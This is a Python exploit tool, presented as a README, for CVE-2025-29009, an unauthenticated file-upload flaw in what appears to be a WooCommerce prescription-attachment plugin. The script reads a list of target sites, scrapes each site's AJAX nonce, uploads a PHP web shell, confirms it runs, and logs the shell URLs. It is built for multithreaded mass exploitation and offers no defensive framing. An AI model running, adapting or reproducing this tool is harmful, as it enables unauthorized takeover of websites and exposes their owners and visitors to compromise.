README.md
Rendering markdown...
#Nxploited
# GitHub: https://github.com/Nxploited
import threading
import requests
import time
import os
import re
import json
import urllib3
import warnings
from queue import Queue, Empty
from rich.console import Console
from rich.text import Text
from rich.panel import Panel
from rich import box
from rich.theme import Theme
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)
os.environ["NO_PROXY"] = "*"
theme = Theme({
"banner": "bold bright_cyan",
"accent": "bold bright_white",
"ok": "bold bright_green",
"fail": "bold bright_red",
"info": "bright_white",
"dim": "dim",
"hacker": "bold bright_green",
})
console = Console(
theme=theme,
force_terminal=True,
color_system="truecolor",
soft_wrap=True
)
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
REQUEST_TIMEOUT = 10
DEFAULT_THREADS = 10
SHELLS_FILE = "shells.txt"
shell_local_file = None
shell_signature = None
target_queue: "Queue[str]" = Queue()
state = {
"total": 0,
"processed": 0,
"ok": 0,
"fail": 0,
}
state_lock = threading.Lock()
def banner():
lines = [
" ,-. . , ,--. ,-. ,-. ,-. ;--' ,-. ,-. ,-. ,-. ,-. ",
"/ | / | ) / /\\ ) | ) ( ) / /\\ / /\\ ( ) ",
"| | / |- --- / | / | / `-. --- / `-'| | / | | / | `-'| ",
"\\ |/ | / \\/ / / ) / / \\/ / \\/ / / ",
" `-' ' `--' '--' `-' '--' `-' '--' `-' `-' `-' `-' ",
]
name = "Nxploited"
name_len = len(name)
txt = Text()
for idx, line in enumerate(lines):
if idx == 2:
mid = len(line) // 2
start = mid - (name_len // 2)
if start < 0:
start = 0
end = start + name_len
left = line[:start]
right = line[end:]
txt.append(left, style="banner")
txt.append(name, style="hacker")
txt.append(right + "\n", style="banner")
else:
txt.append(line + "\n", style="banner")
txt.append("\n", style="banner")
txt.append("CVE-2025-29009 | File Upload\n", style="ok")
console.print(Panel(txt, box=box.SQUARE, border_style="ok"))
def ask_config():
global shell_local_file, shell_signature
list_file = console.input("[accent]Targets file (default list.txt): [/]").strip()
if not list_file:
list_file = "list.txt"
threads_raw = console.input(f"[accent]Threads (default {DEFAULT_THREADS}): [/]").strip()
try:
threads = int(threads_raw) if threads_raw else DEFAULT_THREADS
except Exception:
threads = DEFAULT_THREADS
if threads < 1:
threads = 1
shell_name = console.input("[accent]Local shell filename (e.g. shell.php): [/]").strip()
if not shell_name:
shell_name = "shell.php"
shell_local_file = shell_name
sig = console.input("[accent]Unique shell signature (e.g. NxploitedShellOK): [/]").strip()
if not sig:
sig = "NxploitedShellOK"
shell_signature = sig
return list_file, threads
def read_targets(path: str):
targets = []
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
for line in f:
url = line.strip()
if not url:
continue
if not url.lower().startswith(("http://", "https://")):
url = "http://" + url
targets.append(url.rstrip("/"))
except FileNotFoundError:
console.print(f"[fail]Targets file not found: {path}[/fail]")
raise
return targets
def save_shell_url(url: str):
try:
with open(SHELLS_FILE, "a", encoding="utf-8", errors="ignore") as f:
f.write(url.strip() + "\n")
except Exception:
pass
def wide_nonce_extract(html: str):
patterns = [
r"var\s+wkwcpaFrontObj\s*=\s*(\{.*?\});",
r"wkwcpaFrontObj\s*=\s*(\{.*?\});",
]
for pat in patterns:
m = re.search(pat, html, re.DOTALL)
if not m:
continue
obj_str = m.group(1)
try:
data = json.loads(obj_str)
except Exception:
continue
ajax = data.get("ajax", {})
ajax_url = ajax.get("ajaxUrl") or ajax.get("ajax_url")
ajax_nonce = ajax.get("ajaxNonce") or ajax.get("ajax_nonce")
if ajax_url and ajax_nonce:
return ajax_url, ajax_nonce
m = re.search(r'"ajaxUrl"\s*:\s*"([^"]+)"[^}]*"ajaxNonce"\s*:\s*"([^"]+)"', html)
if m:
return m.group(1), m.group(2)
m = re.search(r'"ajaxNonce"\s*:\s*"([^"]+)"[^}]*"ajaxUrl"\s*:\s*"([^"]+)"', html)
if m:
return m.group(2), m.group(1)
m = re.search(r'wkwcpaFrontObj[^;]*', html)
if m:
chunk = m.group(0)
url_m = re.search(r'["\']ajaxUrl["\']\s*:\s*["\']([^"\']+)["\']', chunk)
nonce_m = re.search(r'["\']ajaxNonce["\']\s*:\s*["\']([^"\']+)["\']', chunk)
if url_m and nonce_m:
return url_m.group(1), nonce_m.group(1)
return None, None
def resolve_front_page(base: str):
candidates = [
base + "/",
base + "/shop/",
base + "/product/",
base + "/?wkwcpa=1",
]
for url in candidates:
try:
resp = requests.get(
url,
headers={"User-Agent": USER_AGENT},
verify=False,
timeout=REQUEST_TIMEOUT,
)
if resp.status_code in (200, 302, 301):
return url, resp.text
except Exception:
continue
return None, None
def get_nonce_and_ajax(base: str):
front_url, html = resolve_front_page(base)
if not front_url or not html:
return None, None, "no_front_page"
ajax_url, nonce = wide_nonce_extract(html)
if not ajax_url or not nonce:
return None, None, "nonce_not_found"
return ajax_url, nonce, None
def upload_shell(base: str):
if not shell_local_file or not os.path.exists(shell_local_file):
return False, None, "shell_file_missing"
ajax_url, nonce, err = get_nonce_and_ajax(base)
if err is not None:
return False, None, err
files = {
"wkwc_pa_prescription_attachment[]": open(shell_local_file, "rb")
}
data = {
"action": "wkwcpa_handle_prescription_session",
"nonce": nonce,
"type": "upload",
}
try:
resp = requests.post(
ajax_url,
data=data,
files=files,
headers={"User-Agent": USER_AGENT},
verify=False,
timeout=REQUEST_TIMEOUT,
)
except Exception:
try:
files["wkwc_pa_prescription_attachment[]"].close()
except Exception:
pass
return False, None, "upload_error"
try:
files["wkwc_pa_prescription_attachment[]"].close()
except Exception:
pass
try:
result = resp.json()
except Exception:
return False, None, "json_parse_error"
if not isinstance(result, dict):
return False, None, "json_not_dict"
data_obj = result.get("data") or {}
if not isinstance(data_obj, dict):
return False, None, "data_not_dict"
if not data_obj.get("success"):
return False, None, "success_false"
attachments = data_obj.get("attachments_img_html") or []
if not isinstance(attachments, list) or not attachments:
return False, None, "no_attachments"
html = " ".join(str(x) for x in attachments)
name = os.path.basename(shell_local_file)
m = re.search(r'src=["\']([^"\']*%s)["\']' % re.escape(name), html)
if not m:
m = re.search(r'src=["\']([^"\']+)["\']', html)
if not m:
return False, None, "shell_url_not_found"
shell_url = m.group(1)
return True, shell_url, None
def verify_shell(shell_url: str):
try:
resp = requests.get(
shell_url,
headers={"User-Agent": USER_AGENT},
verify=False,
timeout=REQUEST_TIMEOUT,
)
except Exception:
return False
if resp.status_code == 200 and shell_signature and shell_signature in resp.text:
return True
return False
def print_status_line():
with state_lock:
total = state["total"]
processed = state["processed"]
ok = state["ok"]
fail = state["fail"]
msg = Text()
msg.append("[", style="dim")
msg.append("Status", style="accent")
msg.append("] ", style="dim")
msg.append(f"{processed}/{total} ", style="info")
msg.append("OK:", style="dim")
msg.append(f"{ok} ", style="ok")
msg.append("FAIL:", style="dim")
msg.append(f"{fail}", style="fail")
console.print(msg)
def worker():
while True:
try:
target = target_queue.get_nowait()
except Empty:
return
base = target.rstrip("/")
try:
ok, shell_url, err = upload_shell(base)
except Exception:
ok, shell_url, err = False, None, "internal_error"
if ok and shell_url and verify_shell(shell_url):
save_shell_url(shell_url)
with state_lock:
state["ok"] += 1
console.print(f"[ok]SHELL[/ok] {shell_url}")
else:
with state_lock:
state["fail"] += 1
console.print(f"[fail]FAIL[/fail] {base} ({err})")
with state_lock:
state["processed"] += 1
target_queue.task_done()
def main():
banner()
list_file, threads = ask_config()
try:
targets = read_targets(list_file)
except Exception:
return
if not targets:
console.print("[fail]No targets loaded[/fail]")
return
for t in targets:
target_queue.put(t)
with state_lock:
state["total"] = len(targets)
state["processed"] = 0
state["ok"] = 0
state["fail"] = 0
threads_list = []
for _ in range(min(threads, len(targets) or 1)):
th = threading.Thread(target=worker, daemon=True)
th.start()
threads_list.append(th)
last_processed = -1
while True:
with state_lock:
processed = state["processed"]
total = state["total"]
if processed != last_processed:
print_status_line()
last_processed = processed
if processed >= total:
break
time.sleep(0.5)
target_queue.join()
for th in threads_list:
th.join(timeout=0.1)
console.print()
print_status_line()
console.print(Panel(Text(f"Shell URLs saved to {SHELLS_FILE}", style="ok"), border_style="ok", box=box.ROUNDED))
if __name__ == "__main__":
main()